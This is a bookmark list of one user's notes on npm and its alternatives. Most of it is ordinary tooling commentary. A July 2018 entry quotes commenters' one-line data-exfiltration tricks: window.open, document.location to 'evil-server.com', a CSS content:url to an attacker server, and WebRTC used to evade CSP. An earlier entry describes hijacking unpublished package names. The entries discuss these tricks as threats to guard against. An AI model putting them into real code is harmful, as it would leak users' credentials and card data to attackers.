dandv + npm + against   12

pnpm does module hard/sym linking better than Yarn
See my comment too: Parcel works with pnpm, yarn didn't.

Only downside is that eslint needs eslint-import-resolver-node:

See also https://iamturns.com/yarn-vs-npm-2018/#comment-4255639506
pnpm  against  yarn  npm 
december 2018 by dandv
2016: I've Just Liberated My Modules | Hacker News
Unclear how this was solved.

[[The fact that this is possible with NPM seems really dangerous. The author unpublished (erm, "liberated") over 250 NPM modules, making those global names (e.g. "map", "alert", "iframe", "subscription", etc) available for anyone to register and replace with any code they wish.

Since these libs are now baked into various package.json configuration files (some with 10s of thousands of installs per month, "left-pad" with 2.5M/month), meaning a malicious actor could publish a new patch version bump (for every major and minor version combination) of these libs and ship whatever they want to future npm builds. Because most package.json configs use the "^1.0.1" caret convention (and npm --save defaults to this mode), the vast majority of future installs could grab the malicious version.

This is extremely severe. Any package i install might after x levels of sub-dependencies pull in one of these names which are potentially pwned. React and Babel pulled in a few of them to take some well known examples.

I would say the whole npm is pwned until these packages are either restored or that the package name is blacklisted/reserved.]]
security  exploit  against  npm  kik 
september 2018 by dandv
I’m harvesting credit card numbers and passwords from your site. Here’s how.
Extremely legit concern.


* npm package compromises did happen, e.g.
* https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
* https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
* https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
`window.open(‘https://legit-analytics.com?q=${payload}', ‘_blank’).close()` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.

* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front facing Node.js servers had little limitations to what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet..


* "At the end of the day, if you can do document.location = https://evil-server.com/bounce?q=data (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use insertRule to add some css.
e.g. something::after { content:url(“evilserver.com/userdatastring”) }"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open-source  cool 
july 2018 by dandv
Yarn: A new package manager for JavaScript | Engineering Blog | Facebook Code
The npm client installs dependencies into the node_modules directory non-deterministically. This means that based on the order dependencies are installed, the structure of a node_modules directory could be different from one person to another. These differences can cause “works on my machine” bugs that take a long time to hunt down.

On some Facebook projects, Yarn reduced the install process by an order of magnitude, from several minutes to just seconds. Yarn also uses a mutex to ensure that multiple running CLI instances don't collide and pollute each other.
yarn  against  npm  alternative  Node.js 
october 2016 by dandv
Small modules: it’s not quite that simple — Medium
[[Why npm is the most popular package manager

[because] we in the JavaScript world have a higher tolerance for nonsense and dreck. npm makes it ridiculously easy for people to release their half-baked experiments into the wild. The only barrier to entry is the difficulty of finding an unused package name. I’m all in favour of enabling creators, but npm lowers the barriers right to the floor, with predictable results. Bear this in mind when encountering npm stats

But the one problem you simply can’t solve as long as the ‘small modules’ philosophy dominates is that no matter how good the discovery tools are, you can’t discover answers to questions you can’t yet formulate. api.jquery.com and lodash.com/docs and d3/wiki are more than just references; they give you ideas about how to conceptualise problems, and the vocabulary to communicate them to other developers. We need more libraries like those, that tackle an entire domain rather than a microscopic problem.

You can go a long way as a developer with the jQuery Swiss Army knife in your pocket.]]
against  npm  small  modules 
august 2016 by dandv
Why use Bower when there is npm? - Quora
"There is simply no benefit for a front-end developer to use Bower over npm." -- Mattias Petter Johansson, JavaScript developer at Spotify
npm  against  bower 
june 2015 by dandv
Why my team uses npm instead of bower — Medium
Unusual environment - "My team builds an SDK for creating and deploying web apps".

"npm is not designed with tools that build other projects in mind"
npm  against  bower 
march 2015 by dandv
Why I Hate NPM - Jongleberry
Great list of reasons why npmjs sucks
against  npm  Node.js 
march 2014 by dandv
Node.JS npm modules for CSV handling
Fucking npmjs.org doesn't have a rating system, so you have to weed out all the crap before getting to useful, tested modules.

* https://npmjs.org/package/csv - most downloads & contributors. Can't read in chunks - https://github.com/wdavidw/node-csv-parser/issues/102

* https://npmjs.org/package/fast-csv - claims to be faster by not caring about corner cases like newlines in values. Fuck it - doesn't run in certain contexts - https://github.com/C2FO/fast-csv/issues/9

* https://npmjs.org/package/csv-string - explicit support for newlines in values (and even in the column names)

* https://npmjs.org/package/csv2json
* https://npmjs.org/package/csv2json-stream
* https://npmjs.org/package/csv-streamify

* https://npmjs.org/package/csvdb - read-only document store (parse a CSV from a URL)
Node.js  CSV  module  npm  against 
april 2013 by dandv

Copy this bookmark: